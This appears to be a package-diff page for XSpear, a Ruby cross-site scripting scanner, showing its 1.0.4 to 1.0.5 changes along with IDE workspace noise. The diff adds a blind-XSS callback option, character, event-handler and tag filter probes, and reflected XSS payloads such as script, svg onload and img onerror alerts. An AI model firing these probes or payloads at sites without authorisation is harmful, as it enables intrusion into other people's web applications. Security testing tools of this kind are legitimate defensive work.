XSpear 1.0.4 → 1.0.5
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +4 -4
- data/.idea/workspace.xml +73 -53
- data/exe/XSpear +6 -2
- data/lib/XSpear/XSpearRepoter.rb +42 -2
- data/lib/XSpear/version.rb +1 -1
- data/lib/XSpear.rb +65 -24
- metadata +2 -3
- data/XSpear-1.0.3.gem +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
|
|
4
|
+
data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
|
|
7
|
+
data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af
|
data/.idea/workspace.xml
CHANGED
|
@@ -2,7 +2,11 @@
|
|
|
2
2
|
<project version="4">
|
|
3
3
|
<component name="ChangeListManager">
|
|
4
4
|
<list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
|
|
5
|
+
<change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
|
|
5
6
|
<change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
|
|
7
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
|
|
8
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
|
|
9
|
+
<change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
|
|
6
10
|
</list>
|
|
7
11
|
<option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
|
|
8
12
|
<option name="SHOW_DIALOG" value="false" />
|
|
@@ -15,11 +19,11 @@
|
|
|
15
19
|
</component>
|
|
16
20
|
<component name="FileEditorManager">
|
|
17
21
|
<leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
|
|
18
|
-
<file pinned="false" current-in-tab="
|
|
22
|
+
<file pinned="false" current-in-tab="false">
|
|
19
23
|
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
20
24
|
<provider selected="true" editor-type-id="text-editor">
|
|
21
|
-
<state relative-caret-position="
|
|
22
|
-
<caret line="
|
|
25
|
+
<state relative-caret-position="496">
|
|
26
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
23
27
|
</state>
|
|
24
28
|
</provider>
|
|
25
29
|
</entry>
|
|
@@ -39,8 +43,8 @@
|
|
|
39
43
|
<file pinned="false" current-in-tab="false">
|
|
40
44
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
41
45
|
<provider selected="true" editor-type-id="text-editor">
|
|
42
|
-
<state relative-caret-position="
|
|
43
|
-
<caret line="
|
|
46
|
+
<state relative-caret-position="528">
|
|
47
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
44
48
|
</state>
|
|
45
49
|
</provider>
|
|
46
50
|
</entry>
|
|
@@ -48,8 +52,8 @@
|
|
|
48
52
|
<file pinned="false" current-in-tab="false">
|
|
49
53
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
50
54
|
<provider selected="true" editor-type-id="text-editor">
|
|
51
|
-
<state relative-caret-position="
|
|
52
|
-
<caret line="
|
|
55
|
+
<state relative-caret-position="586">
|
|
56
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
53
57
|
</state>
|
|
54
58
|
</provider>
|
|
55
59
|
</entry>
|
|
@@ -67,12 +71,12 @@
|
|
|
67
71
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
68
72
|
<provider selected="true" editor-type-id="text-editor">
|
|
69
73
|
<state relative-caret-position="195">
|
|
70
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="
|
|
74
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
71
75
|
</state>
|
|
72
76
|
</provider>
|
|
73
77
|
</entry>
|
|
74
78
|
</file>
|
|
75
|
-
<file pinned="false" current-in-tab="
|
|
79
|
+
<file pinned="false" current-in-tab="true">
|
|
76
80
|
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
77
81
|
<provider selected="true" editor-type-id="text-editor">
|
|
78
82
|
<state relative-caret-position="15">
|
|
@@ -84,7 +88,7 @@
|
|
|
84
88
|
<file pinned="false" current-in-tab="false">
|
|
85
89
|
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
86
90
|
<provider selected="true" editor-type-id="text-editor">
|
|
87
|
-
<state relative-caret-position="
|
|
91
|
+
<state relative-caret-position="105">
|
|
88
92
|
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
89
93
|
</state>
|
|
90
94
|
</provider>
|
|
@@ -109,19 +113,19 @@
|
|
|
109
113
|
<option name="CHANGED_PATHS">
|
|
110
114
|
<list>
|
|
111
115
|
<option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
|
|
112
|
-
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
113
116
|
<option value="$PROJECT_DIR$/XSpear.gemspec" />
|
|
114
117
|
<option value="$PROJECT_DIR$/README.md" />
|
|
115
118
|
<option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
|
|
116
|
-
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
117
|
-
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
118
119
|
<option value="$PROJECT_DIR$/exe/XSpear" />
|
|
120
|
+
<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
|
|
121
|
+
<option value="$PROJECT_DIR$/lib/XSpear.rb" />
|
|
122
|
+
<option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
|
|
119
123
|
</list>
|
|
120
124
|
</option>
|
|
121
125
|
</component>
|
|
122
|
-
<component name="ProjectFrameBounds"
|
|
123
|
-
<option name="x" value="-
|
|
124
|
-
<option name="y" value="-
|
|
126
|
+
<component name="ProjectFrameBounds">
|
|
127
|
+
<option name="x" value="-1920" />
|
|
128
|
+
<option name="y" value="-620" />
|
|
125
129
|
<option name="width" value="1920" />
|
|
126
130
|
<option name="height" value="1057" />
|
|
127
131
|
</component>
|
|
@@ -133,7 +137,6 @@
|
|
|
133
137
|
<foldersAlwaysOnTop value="true" />
|
|
134
138
|
</navigator>
|
|
135
139
|
<panes>
|
|
136
|
-
<pane id="Scope" />
|
|
137
140
|
<pane id="ProjectPane">
|
|
138
141
|
<subPane>
|
|
139
142
|
<expand>
|
|
@@ -171,6 +174,7 @@
|
|
|
171
174
|
<select />
|
|
172
175
|
</subPane>
|
|
173
176
|
</pane>
|
|
177
|
+
<pane id="Scope" />
|
|
174
178
|
</panes>
|
|
175
179
|
</component>
|
|
176
180
|
<component name="PropertiesComponent">
|
|
@@ -228,7 +232,8 @@
|
|
|
228
232
|
<option name="presentableId" value="Default" />
|
|
229
233
|
<updated>1562942814778</updated>
|
|
230
234
|
<workItem from="1562942816004" duration="15337000" />
|
|
231
|
-
<workItem from="1563638656518" duration="
|
|
235
|
+
<workItem from="1563638656518" duration="4985000" />
|
|
236
|
+
<workItem from="1563809961097" duration="3592000" />
|
|
232
237
|
</task>
|
|
233
238
|
<task id="LOCAL-00001" summary="init update">
|
|
234
239
|
<created>1562945899597</created>
|
|
@@ -405,20 +410,33 @@
|
|
|
405
410
|
<option name="project" value="LOCAL" />
|
|
406
411
|
<updated>1563648949262</updated>
|
|
407
412
|
</task>
|
|
408
|
-
<
|
|
413
|
+
<task id="LOCAL-00026" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
414
|
+
<created>1563649920055</created>
|
|
415
|
+
<option name="number" value="00026" />
|
|
416
|
+
<option name="presentableId" value="LOCAL-00026" />
|
|
417
|
+
<option name="project" value="LOCAL" />
|
|
418
|
+
<updated>1563649920055</updated>
|
|
419
|
+
</task>
|
|
420
|
+
<task id="LOCAL-00027" summary="verbose가 1일 떄 배너 출력되지 않도록 수정">
|
|
421
|
+
<created>1563649975625</created>
|
|
422
|
+
<option name="number" value="00027" />
|
|
423
|
+
<option name="presentableId" value="LOCAL-00027" />
|
|
424
|
+
<option name="project" value="LOCAL" />
|
|
425
|
+
<updated>1563649975625</updated>
|
|
426
|
+
</task>
|
|
427
|
+
<option name="localTasksCounter" value="28" />
|
|
409
428
|
<servers />
|
|
410
429
|
</component>
|
|
411
430
|
<component name="TimeTrackingManager">
|
|
412
|
-
<option name="totallyTimeSpent" value="
|
|
431
|
+
<option name="totallyTimeSpent" value="23914000" />
|
|
413
432
|
</component>
|
|
414
433
|
<component name="ToolWindowManager">
|
|
415
434
|
<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
|
|
416
435
|
<editor active="true" />
|
|
417
436
|
<layout>
|
|
418
|
-
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.
|
|
437
|
+
<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
|
|
419
438
|
<window_info id="Structure" order="1" side_tool="true" weight="0.25" />
|
|
420
439
|
<window_info id="Favorites" order="2" side_tool="true" />
|
|
421
|
-
<window_info anchor="bottom" id="Messages" weight="0.32953367" />
|
|
422
440
|
<window_info anchor="bottom" id="Message" order="0" />
|
|
423
441
|
<window_info anchor="bottom" id="Find" order="1" />
|
|
424
442
|
<window_info anchor="bottom" id="Run" order="2" weight="0.32953367" />
|
|
@@ -431,6 +449,7 @@
|
|
|
431
449
|
<window_info anchor="bottom" id="Version Control" order="9" />
|
|
432
450
|
<window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
|
|
433
451
|
<window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
|
|
452
|
+
<window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
|
|
434
453
|
<window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
|
|
435
454
|
<window_info anchor="right" id="Ant Build" order="1" weight="0.25" />
|
|
436
455
|
<window_info anchor="right" content_ui="combo" id="Hierarchy" order="2" weight="0.25" />
|
|
@@ -457,7 +476,8 @@
|
|
|
457
476
|
<MESSAGE value="Add show version & edit help, version in banner" />
|
|
458
477
|
<MESSAGE value="Edit version , release 1.0.2" />
|
|
459
478
|
<MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
|
|
460
|
-
<
|
|
479
|
+
<MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
480
|
+
<option name="LAST_COMMIT_MESSAGE" value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
|
|
461
481
|
</component>
|
|
462
482
|
<component name="editorHistoryManager">
|
|
463
483
|
<entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
|
|
@@ -473,19 +493,6 @@
|
|
|
473
493
|
<entry file="file://$PROJECT_DIR$/bin/setup">
|
|
474
494
|
<provider selected="true" editor-type-id="text-editor" />
|
|
475
495
|
</entry>
|
|
476
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
477
|
-
<provider selected="true" editor-type-id="text-editor">
|
|
478
|
-
<state relative-caret-position="195">
|
|
479
|
-
<caret line="13" column="19" selection-start-line="13" selection-start-column="11" selection-end-line="13" selection-end-column="19" />
|
|
480
|
-
</state>
|
|
481
|
-
</provider>
|
|
482
|
-
</entry>
|
|
483
|
-
<entry file="file:///usr/local/bin/rake">
|
|
484
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
485
|
-
</entry>
|
|
486
|
-
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
487
|
-
<provider selected="true" editor-type-id="text-editor" />
|
|
488
|
-
</entry>
|
|
489
496
|
<entry file="file://$PROJECT_DIR$/README.md">
|
|
490
497
|
<provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
|
|
491
498
|
<state split_layout="SPLIT">
|
|
@@ -496,45 +503,58 @@
|
|
|
496
503
|
</state>
|
|
497
504
|
</provider>
|
|
498
505
|
</entry>
|
|
499
|
-
<entry file="file://$PROJECT_DIR$/XSpear.
|
|
506
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
|
|
500
507
|
<provider selected="true" editor-type-id="text-editor">
|
|
501
|
-
<state relative-caret-position="
|
|
502
|
-
<caret line="
|
|
508
|
+
<state relative-caret-position="180">
|
|
509
|
+
<caret line="12" column="69" selection-start-line="12" selection-start-column="69" selection-end-line="12" selection-end-column="69" />
|
|
503
510
|
</state>
|
|
504
511
|
</provider>
|
|
505
512
|
</entry>
|
|
506
|
-
<entry file="file://$PROJECT_DIR$/
|
|
513
|
+
<entry file="file://$PROJECT_DIR$/Rakefile">
|
|
514
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
515
|
+
</entry>
|
|
516
|
+
<entry file="file:///usr/local/bin/rake">
|
|
517
|
+
<provider selected="true" editor-type-id="text-editor" />
|
|
518
|
+
</entry>
|
|
519
|
+
<entry file="file://$PROJECT_DIR$/exe/XSpear">
|
|
507
520
|
<provider selected="true" editor-type-id="text-editor">
|
|
508
|
-
<state relative-caret-position="
|
|
509
|
-
<caret line="
|
|
521
|
+
<state relative-caret-position="496">
|
|
522
|
+
<caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
|
|
510
523
|
</state>
|
|
511
524
|
</provider>
|
|
512
525
|
</entry>
|
|
513
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
526
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
|
|
514
527
|
<provider selected="true" editor-type-id="text-editor">
|
|
515
|
-
<state relative-caret-position="
|
|
516
|
-
<caret line="13" lean-forward="true" selection-start-line="13" selection-end-line="13" />
|
|
528
|
+
<state relative-caret-position="195">
|
|
529
|
+
<caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
|
|
517
530
|
</state>
|
|
518
531
|
</provider>
|
|
519
532
|
</entry>
|
|
520
|
-
<entry file="file://$PROJECT_DIR$/lib/XSpear/
|
|
533
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
|
|
521
534
|
<provider selected="true" editor-type-id="text-editor">
|
|
522
|
-
<state relative-caret-position="
|
|
523
|
-
<caret line="
|
|
535
|
+
<state relative-caret-position="586">
|
|
536
|
+
<caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
|
|
524
537
|
</state>
|
|
525
538
|
</provider>
|
|
526
539
|
</entry>
|
|
527
540
|
<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
|
|
528
541
|
<provider selected="true" editor-type-id="text-editor">
|
|
529
|
-
<state relative-caret-position="
|
|
530
|
-
<caret line="
|
|
542
|
+
<state relative-caret-position="528">
|
|
543
|
+
<caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
|
|
531
544
|
</state>
|
|
532
545
|
</provider>
|
|
533
546
|
</entry>
|
|
534
|
-
<entry file="file://$PROJECT_DIR$/
|
|
547
|
+
<entry file="file://$PROJECT_DIR$/XSpear.gemspec">
|
|
535
548
|
<provider selected="true" editor-type-id="text-editor">
|
|
536
|
-
<state relative-caret-position="
|
|
537
|
-
<caret line="
|
|
549
|
+
<state relative-caret-position="105">
|
|
550
|
+
<caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
|
|
551
|
+
</state>
|
|
552
|
+
</provider>
|
|
553
|
+
</entry>
|
|
554
|
+
<entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
|
|
555
|
+
<provider selected="true" editor-type-id="text-editor">
|
|
556
|
+
<state relative-caret-position="15">
|
|
557
|
+
<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
|
|
538
558
|
</state>
|
|
539
559
|
</provider>
|
|
540
560
|
</entry>
|
data/exe/XSpear
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
#!/usr/bin/env ruby
|
|
2
2
|
|
|
3
3
|
require "XSpear"
|
|
4
|
-
Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output)
|
|
4
|
+
Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output, :blind)
|
|
5
5
|
class Parser
|
|
6
6
|
def self.parse(options)
|
|
7
7
|
args = Options.new('xspear')
|
|
@@ -33,6 +33,10 @@ class Parser
|
|
|
33
33
|
args.params = n
|
|
34
34
|
end
|
|
35
35
|
|
|
36
|
+
opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
|
|
37
|
+
args.blind = n
|
|
38
|
+
end
|
|
39
|
+
|
|
36
40
|
opts.on('-t', '--threads=NUMBER', '[optional] thread , default: 10') do |n|
|
|
37
41
|
args.thread = n
|
|
38
42
|
end
|
|
@@ -78,5 +82,5 @@ options.verbose = 2 unless options.verbose
|
|
|
78
82
|
if options.verbose.to_i != 1
|
|
79
83
|
banner
|
|
80
84
|
end
|
|
81
|
-
s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose
|
|
85
|
+
s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose, options.blind
|
|
82
86
|
s.run
|
data/lib/XSpear/XSpearRepoter.rb
CHANGED
|
@@ -19,6 +19,7 @@ class XspearRepoter
|
|
|
19
19
|
@endtime = nil
|
|
20
20
|
@issue = []
|
|
21
21
|
@query = []
|
|
22
|
+
@filtered_objects = {}
|
|
22
23
|
# type : i,v,l,m,h
|
|
23
24
|
# param : paramter
|
|
24
25
|
# type :
|
|
@@ -29,6 +30,13 @@ class XspearRepoter
|
|
|
29
30
|
# callback
|
|
30
31
|
end
|
|
31
32
|
|
|
33
|
+
def add_issue_first(type, issue, param, payload, pattern, description)
|
|
34
|
+
rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
|
|
35
|
+
rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
|
|
36
|
+
@issue.insert(0,["-", rtype[type], rissue[issue], param, pattern, description])
|
|
37
|
+
@query.push payload
|
|
38
|
+
end
|
|
39
|
+
|
|
32
40
|
def add_issue(type, issue, param, payload, pattern, description)
|
|
33
41
|
rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
|
|
34
42
|
rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
|
|
@@ -36,6 +44,9 @@ class XspearRepoter
|
|
|
36
44
|
@query.push payload
|
|
37
45
|
end
|
|
38
46
|
|
|
47
|
+
def set_filtered f
|
|
48
|
+
@filtered_objects = f
|
|
49
|
+
end
|
|
39
50
|
def set_endtime
|
|
40
51
|
@endtime = Time.now
|
|
41
52
|
end
|
|
@@ -58,13 +69,42 @@ class XspearRepoter
|
|
|
58
69
|
def to_html; end
|
|
59
70
|
|
|
60
71
|
def to_cli
|
|
72
|
+
rurl = ""
|
|
73
|
+
if @url.length > 66
|
|
74
|
+
rurl = @url[0..66]+"... (snip)"
|
|
75
|
+
else
|
|
76
|
+
rurl = @url
|
|
77
|
+
end
|
|
61
78
|
table = Terminal::Table.new
|
|
62
|
-
table.title = "[ XSpear report ]\n#{
|
|
79
|
+
table.title = "[ XSpear report ]".red+"\n#{rurl}\n#{@starttime} ~ #{@endtime} Found #{@issue.length} issues."
|
|
63
80
|
table.headings = ['NO','TYPE','ISSUE','PARAM','PAYLOAD','DESCRIPTION']
|
|
64
81
|
table.rows = @issue
|
|
65
82
|
#table.style = {:width => 80}
|
|
66
83
|
puts table
|
|
67
|
-
puts "<
|
|
84
|
+
puts "< Not Filtered >".yellow
|
|
85
|
+
@filtered_objects.each do |key, value|
|
|
86
|
+
eh = []
|
|
87
|
+
tag = []
|
|
88
|
+
sc = []
|
|
89
|
+
puts "[#{key}]".blue+" param"
|
|
90
|
+
value.each do |n|
|
|
91
|
+
if n.include? "=64"
|
|
92
|
+
# eh
|
|
93
|
+
eh.push n.chomp("=64")
|
|
94
|
+
elsif n.include? "xsp<"
|
|
95
|
+
# tag
|
|
96
|
+
n = n.sub("xsp<","")
|
|
97
|
+
tag.push n.chomp(">")
|
|
98
|
+
else
|
|
99
|
+
# sc
|
|
100
|
+
sc.push n.sub("XsPeaR","")
|
|
101
|
+
end
|
|
102
|
+
end
|
|
103
|
+
puts " + Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}"
|
|
104
|
+
puts " + Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
|
|
105
|
+
puts " + HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
|
|
106
|
+
end
|
|
107
|
+
puts "< Raw Query >".yellow
|
|
68
108
|
@query.each_with_index do |q, i|
|
|
69
109
|
puts "[#{i}] "+@url+"?"+q
|
|
70
110
|
end
|
data/lib/XSpear/version.rb
CHANGED
data/lib/XSpear.rb
CHANGED
|
@@ -13,7 +13,7 @@ module XSpear
|
|
|
13
13
|
end
|
|
14
14
|
|
|
15
15
|
class XspearScan
|
|
16
|
-
def initialize(url, data, headers, params, thread, output, verbose)
|
|
16
|
+
def initialize(url, data, headers, params, thread, output, verbose, blind)
|
|
17
17
|
@url = url
|
|
18
18
|
@data = data
|
|
19
19
|
@headers = headers
|
|
@@ -25,7 +25,9 @@ class XspearScan
|
|
|
25
25
|
@thread = thread
|
|
26
26
|
@output = output
|
|
27
27
|
@verbose = verbose
|
|
28
|
+
@blind_url = blind
|
|
28
29
|
@report = XspearRepoter.new @url, Time.now
|
|
30
|
+
@filtered_objects = {}
|
|
29
31
|
end
|
|
30
32
|
|
|
31
33
|
class ScanCallbackFunc
|
|
@@ -59,6 +61,17 @@ class XspearScan
|
|
|
59
61
|
end
|
|
60
62
|
end
|
|
61
63
|
|
|
64
|
+
class CallbackNotAdded < ScanCallbackFunc
|
|
65
|
+
def run
|
|
66
|
+
if @response.body.include? @query
|
|
67
|
+
log("i","reflected #{@query}")
|
|
68
|
+
[false, true]
|
|
69
|
+
else
|
|
70
|
+
[false, false]
|
|
71
|
+
end
|
|
72
|
+
end
|
|
73
|
+
end
|
|
74
|
+
|
|
62
75
|
class CallbackErrorPatternMatch < ScanCallbackFunc
|
|
63
76
|
def run
|
|
64
77
|
info = "Found"
|
|
@@ -233,36 +246,53 @@ class XspearScan
|
|
|
233
246
|
'onUnload',
|
|
234
247
|
'onURLFlip'
|
|
235
248
|
]
|
|
249
|
+
tags = [
|
|
250
|
+
"script",
|
|
251
|
+
"iframe"
|
|
252
|
+
]
|
|
253
|
+
special_chars =[
|
|
254
|
+
">",
|
|
255
|
+
"<",
|
|
256
|
+
'"',
|
|
257
|
+
"'",
|
|
258
|
+
"`",
|
|
259
|
+
";",
|
|
260
|
+
"|",
|
|
261
|
+
"(",
|
|
262
|
+
")",
|
|
263
|
+
"{",
|
|
264
|
+
"}",
|
|
265
|
+
"[",
|
|
266
|
+
"]",
|
|
267
|
+
":",
|
|
268
|
+
".",
|
|
269
|
+
",",
|
|
270
|
+
"+",
|
|
271
|
+
"-",
|
|
272
|
+
"=",
|
|
273
|
+
"$"
|
|
274
|
+
]
|
|
236
275
|
|
|
237
276
|
log('s', 'creating a test query.')
|
|
238
277
|
r.push makeQueryPattern('d', 'XsPeaR"', 'XsPeaR"', 'i', "Found SQL Error Pattern", CallbackErrorPatternMatch)
|
|
239
278
|
r.push makeQueryPattern('r', 'rEfe6', 'rEfe6', 'i', 'reflected parameter', CallbackStringMatch)
|
|
240
|
-
# Check Special
|
|
241
|
-
|
|
242
|
-
|
|
243
|
-
|
|
244
|
-
|
|
245
|
-
r.push makeQueryPattern('f', "XsPeaR`", "XsPeaR`", 'i', "not filtered "+"`".blue, CallbackStringMatch)
|
|
246
|
-
r.push makeQueryPattern('f', 'XsPeaR;', 'XsPeaR;', 'i', "not filtered "+";".blue, CallbackStringMatch)
|
|
247
|
-
r.push makeQueryPattern('f', 'XsPeaR|', 'XsPeaR|', 'i', "not filtered "+"|".blue, CallbackStringMatch)
|
|
248
|
-
r.push makeQueryPattern('f', 'XsPeaR(', 'XsPeaR(', 'i', "not filtered "+"(".blue, CallbackStringMatch)
|
|
249
|
-
r.push makeQueryPattern('f', 'XsPeaR)', 'XsPeaR)', 'i', "not filtered "+")".blue, CallbackStringMatch)
|
|
250
|
-
r.push makeQueryPattern('f', 'XsPeaR{', 'XsPeaR{', 'i', "not filtered "+"{".blue, CallbackStringMatch)
|
|
251
|
-
r.push makeQueryPattern('f', 'XsPeaR}', 'XsPeaR}', 'i', "not filtered "+"}".blue, CallbackStringMatch)
|
|
252
|
-
r.push makeQueryPattern('f', 'XsPeaR[', 'XsPeaR[', 'i', "not filtered "+"[".blue, CallbackStringMatch)
|
|
253
|
-
r.push makeQueryPattern('f', 'XsPeaR]', 'XsPeaR]', 'i', "not filtered "+"]".blue, CallbackStringMatch)
|
|
254
|
-
r.push makeQueryPattern('f', 'XsPeaR:', 'XsPeaR:', 'i', "not filtered "+":".blue, CallbackStringMatch)
|
|
255
|
-
r.push makeQueryPattern('f', 'XsPeaR.', 'XsPeaR.', 'i', "not filtered "+".".blue, CallbackStringMatch)
|
|
256
|
-
r.push makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
|
|
257
|
-
r.push makeQueryPattern('f', 'XsPeaR+', 'XsPeaR+', 'i', "not filtered "+"+".blue, CallbackStringMatch)
|
|
258
|
-
r.push makeQueryPattern('f', 'XsPeaR-', 'XsPeaR-', 'i', "not filtered "+"-".blue, CallbackStringMatch)
|
|
259
|
-
r.push makeQueryPattern('f', 'XsPeaR=', 'XsPeaR=', 'i', "not filtered "+"=".blue, CallbackStringMatch)
|
|
260
|
-
r.push makeQueryPattern('f', 'XsPeaR$', 'XsPeaR$', 'i', "not filtered "+"$".blue, CallbackStringMatch)
|
|
279
|
+
# Check Special Char
|
|
280
|
+
special_chars.each do |sc|
|
|
281
|
+
r.push makeQueryPattern('f', "XsPeaR#{sc}>", "XsPeaR#{sc}", 'i', "not filtered "+"#{sc}".blue, CallbackNotAdded)
|
|
282
|
+
end
|
|
283
|
+
|
|
261
284
|
# Check Event Handler
|
|
262
|
-
r.push makeQueryPattern('f', '
|
|
285
|
+
r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
|
|
263
286
|
event_handler.each do |ev|
|
|
264
|
-
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue,
|
|
287
|
+
r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
|
|
265
288
|
end
|
|
289
|
+
|
|
290
|
+
# Check HTML Tag
|
|
291
|
+
tags.each do |tag|
|
|
292
|
+
r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
|
|
293
|
+
end
|
|
294
|
+
|
|
295
|
+
# Check Common XSS Payloads
|
|
266
296
|
r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
267
297
|
r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
268
298
|
r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
|
|
@@ -273,6 +303,13 @@ class XspearScan
|
|
|
273
303
|
